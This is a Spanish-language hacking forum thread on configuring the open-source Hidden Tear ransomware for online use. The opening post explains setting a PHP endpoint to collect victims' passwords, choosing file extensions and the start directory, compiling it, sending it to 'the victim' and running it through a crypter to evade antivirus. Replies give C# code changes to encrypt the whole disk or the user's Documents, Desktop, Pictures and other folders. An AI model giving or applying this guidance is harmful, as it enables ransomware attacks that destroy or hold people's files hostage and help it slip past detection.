comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Configurando Hidden Tear (Online)

  • 15 Respuestas
  • 6986 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« en: Octubre 21, 2015, 06:40:22 pm »

Sigo con las publicaciones sobre este ransomware de código abierto, si no has leído las anteriores, te recomiendo que lo hagas:

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

Para comenzar a configurar este malware, debemos descargar su código source, podemos hacerlo desde su repositorio oficial en github: You are not allowed to view links. Register or Login
Mirror: You are not allowed to view links. Register or Login

Para poder modificarlo y compilarlo, necesitaremos Visual Studio. Abriremos el proyecto que hay en el directorio "hidden-tear", no tendremos problemas para entenderlo y modificar las cosas que queramos, pues el código está perfectamente comentado y muy bien estructurado.

Lo primero que vemos, es a que url enviará el ransomware la información del ordenador y la contraseña, para ello, debemos poner nuestra url y tener el archivo php que se encargue de recibir los datos correctamente creado y con los permisos adecuados.




Ambos ficheros deberán tener permisos de escritura.

En ese paso, podremos modificar la contraseña que queremos que cree aleatoriamente, aunque se puede modificar para dejarla fija.


Aquí podremos elegir que se envía a nuestro fichero php y por tanto se guarda en los logs.


El método de cifrado de ficheros y la extensión que se utilizará.


Extensiones que se encriptarán, podemos suprimir alguna o bien, añadir más.


En que directorio se guardará el txt con el mensaje que queremos dejar y empezará a ejecutar el ransomware, es muy importante que exista el directorio o dará un error cuando la víctima lo ejecute.  Además, tener en cuenta de que si empieza en el Escritorio, no afectará a directorios superiores, para afectar a todo el disco habrá que ejecutarlo en la raiz de C:\ o bien el directorio que nosotros queramos.


Compilamos y se lo enviamos a la víctima.

Por desgracia, Hidden-Tear ya no es fud (Fully UnDetectable).


Como cualquier malware, se puede pasar por un crypter para evitar que sea detectado.



Ejecutamos Hidden Tear y comprobamos que nuestros ficheros se han cifrado con la extensión .locked


Vamos a nuestro fichero de logs y conseguimos la contraseña para recuperar nuestros ficheros.


Utilizando otro proyecto llamado hidden-tear-decrypter (también en github), podremos recuperar los ficheros, utilizando esta contraseña.

Nota: Si alguien le editó la extensión .locked, deberá modificar esta línea escribiendo la extensión que utilizó.



Y tenemos nuestros ficheros de nuevo!


Ver en el blog: You are not allowed to view links. Register or Login

Saludos!
« Última modificación: Marzo 19, 2016, 05:16:07 pm por blackdrake »



Desconectado kid_goth

  • *
  • Underc0der
  • Mensajes: 201
  • Actividad:
    0%
  • Reputación 3
  • Tu conocimiento se limita cuando dices NO PUEDO...
    • Ver Perfil
    • DC Projects
    • Email
« Respuesta #1 en: Octubre 21, 2015, 07:31:11 pm »
Ta muy bueno ese jodido Hidden Tear, a parte de que es PHP uffff a ver si le echamos un bueno ojo (y no el de atrás)... y de paso si podemos generar el run ese para otras plataformas :3 Salutones :D
You are not allowed to view links. Register or Login

Acepta con humildad y aprecio que en la vida la muerte es inevitable y amarás ésta, adorando la muerte

Desconectado dehombreadios

  • *
  • Underc0der
  • Mensajes: 28
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Octubre 23, 2015, 02:54:26 am »
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #3 en: Octubre 23, 2015, 05:50:11 am »
You are not allowed to view links. Register or Login
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D



Desconectado simdia

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Diciembre 23, 2015, 08:50:27 pm »
How Can we affect all C Path ?  Thus; What can we edit in code to affect all C path in the below code:

Código: You are not allowed to view links. Register or Login
public void startAction()
        {
            string password = CreatePassword(15);
            string path = "\\Desktop\\"; <<<<<<<<<<<<--------------(what do we put in here ? to affect entire C disk Encrypt ?)
            string startPath = userDir + userName + path;
            SendPassword(password);
            encryptDirectory(startPath,password);
            messageCreator();
            password = null;
            System.Windows.Forms.Application.Exit();
        }

Desconectado Hu3c0

  • *
  • Underc0der
  • Mensajes: 433
  • Actividad:
    1.67%
  • Reputación 0
  • In the middle Netbeans
    • Ver Perfil
« Respuesta #5 en: Diciembre 24, 2015, 01:16:48 pm »
@You are not allowed to view links. Register or Login the brother  @You are not allowed to view links. Register or Login  responses  your question in the post above

Change this  string path = "\\Desktop\\"    by   string path = "\\"  only with double  backslash and the program starts  changing all harddisk 's extensions


Great post brother blackdrake i didn't see before maybe i'll do in java because it has similar sintax.
« Última modificación: Diciembre 24, 2015, 01:22:05 pm por Hu3c0 »
You are not allowed to view links. Register or Login

Desconectado ho4x69

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Mayo 17, 2016, 09:52:02 am »
Holaa esta bien el programita los ficheros datos.txt y test.php llevan el mismo codigo php dentro? o es que subes test.php con ese codigo y luego cuando la persona abre el ransom se crea automaticamante datos.txt? y luego entraria en datos.txt para ver el pass ? no entendi porque dices que datos.txt y test.php tienen q estar configurados y con permisos pero no muestras si el archivo datos.txt lleva el mismo codigo por eso me salio esta duda. si es que se crea automaticamente o como es. gracias por la posible respuestas. un abrazo y creo que cosas asi son las que me han llevado a estar pegado a este foro. Gracias por los grandes aportes que haces

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #7 en: Mayo 18, 2016, 05:31:38 am »
You are not allowed to view links. Register or Login
Holaa esta bien el programita los ficheros datos.txt y test.php llevan el mismo codigo php dentro? o es que subes test.php con ese codigo y luego cuando la persona abre el ransom se crea automaticamante datos.txt? y luego entraria en datos.txt para ver el pass ? no entendi porque dices que datos.txt y test.php tienen q estar configurados y con permisos pero no muestras si el archivo datos.txt lleva el mismo codigo por eso me salio esta duda. si es que se crea automaticamente o como es. gracias por la posible respuestas. un abrazo y creo que cosas asi son las que me han llevado a estar pegado a este foro. Gracias por los grandes aportes que haces

Test.php tiene el código que muestro, datos.txt estará vacio hasta que se ejecute y guarde algún dato.

Saludos.



Desconectado ho4x69

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Mayo 25, 2016, 08:52:04 am »
Gracias muy buena, eres un crack!  saludos

Desconectado ho4x69

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Mayo 25, 2016, 12:10:42 pm »
Tuviste que modificar alguna cosa mas? solo cambie la pagina web compilo y no se ejecuta . el ejecutable que viene ya si se ejecuta pero si lo compilo sin hacer cambios en el codigo no se ejecuta tampoco. la extension aunque sea .locked tambien hay que cambiar la linea que pusiste por .locked o solo si es por otra cosa? no entiendo mucho porque sin hacer cambios ninguno y volverlo a compilar no funciona , y el ejecutable original es el unico que funciona. quizas falta algun cambio por ahi y el ejecutable ese lo haya puesto desps. un royo que me monte yo solo seguro

Desconectado ho4x69

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Mayo 25, 2016, 03:26:53 pm »
Pues si, funciona haciendo esos pequeños cambios. pero hay que hacerloss si no, no sirve.

Desconectado nanaya2926

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #11 en: Noviembre 24, 2016, 06:30:06 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #12 en: Noviembre 26, 2016, 03:52:32 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.

Ya nos cuentas.

Un saludo.



Conectado sadfud

  • *
  • Moderator
  • Mensajes: 180
  • Actividad:
    6.67%
  • Reputación 9
    • Ver Perfil
    • Blog
  • Skype: SadFud
« Respuesta #13 en: Noviembre 26, 2016, 06:03:00 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.

Ya nos cuentas.

Un saludo.

Prueba a filtrar esa excepcion con un if
Mi blog: You are not allowed to view links. Register or Login
Si necesitas ayuda, no dudes en mandar MP

Desconectado nanaya2926

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #14 en: Noviembre 28, 2016, 12:29:54 am »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.

Ya nos cuentas.

Un saludo.

Hola, gracias por responder, termine haciendo esto:

Código: You are not allowed to view links. Register or Login

public void startAction()
        {
            string passwordPath = userDir + userName + pcPassword;
            string password = File.ReadAllText(passwordPath);
            string path = "\\Documents";
            string path2 = "\\Desktop";
            string path3 = "\\Pictures";
            string path5 = "\\Downloads";
            string path6 = "\\Music";
            string path7 = "\\Videos";
            string startPath = userDir + userName + path;
            string startPath2 = userDir + userName + path2;
            string startPath3 = userDir + userName + path3;
            string startPath5 = userDir + userName + path5;
            string startPath6 = userDir + userName + path6;
            string startPath7 = userDir + userName + path7;
            encryptDirectory(startPath, password);
            encryptDirectory(startPath2, password);
            encryptDirectory(startPath3, password);
            encryptDirectory(startPath5, password);
            encryptDirectory(startPath6, password);
            encryptDirectory(startPath7, password);
            messageCreator();
            password = null;
            File.WriteAllText(passwordPath, String.Empty);
            File.Delete(passwordPath);
            System.Windows.Forms.Application.Exit();
        }


Desconectado cristobal92

  • *
  • Underc0der
  • Mensajes: 36
  • Actividad:
    0%
  • Reputación -1
    • Ver Perfil
« Respuesta #15 en: Mayo 17, 2017, 03:35:56 am »
hola, muchas gracias por tu aporte.
sabes hay algo que no entiendo, es sobre php.
me podrias explicar mejor esa parte, si no es mucha la molestia.
no entiendo lo de la configuración para recibir los datos, se hacen en el servidor? se crea un php en servidor?
de antemano muchas gracias!!
""El problema más grave no es que se le llame delincuente a un hacker, sino, y por el contrario, que se le llame hacker a un delincuente""


 

¿Te gustó el post? COMPARTILO!



ID ransomware: herramienta online

Iniciado por Gabriela

Respuestas: 2
Vistas: 2248
Último mensaje Octubre 09, 2016, 05:38:36 pm
por ceroMee
Configurando EDA2

Iniciado por blackdrake

Respuestas: 29
Vistas: 11901
Último mensaje Octubre 17, 2017, 07:44:38 pm
por facutota
[VIDEO] EDA2 new version (hidden Tear) Ransomware Open Source

Iniciado por GreyCod3

Respuestas: 2
Vistas: 2590
Último mensaje Abril 30, 2016, 05:14:45 pm
por facutota
Hidden Tear el primer Ransomware Open Source

Iniciado por blackdrake

Respuestas: 0
Vistas: 2301
Último mensaje Octubre 11, 2015, 09:49:18 am
por blackdrake
Configurando Hidden Tear (Offline)

Iniciado por blackdrake

Respuestas: 15
Vistas: 7857
Último mensaje Febrero 24, 2018, 02:23:34 pm
por Manzana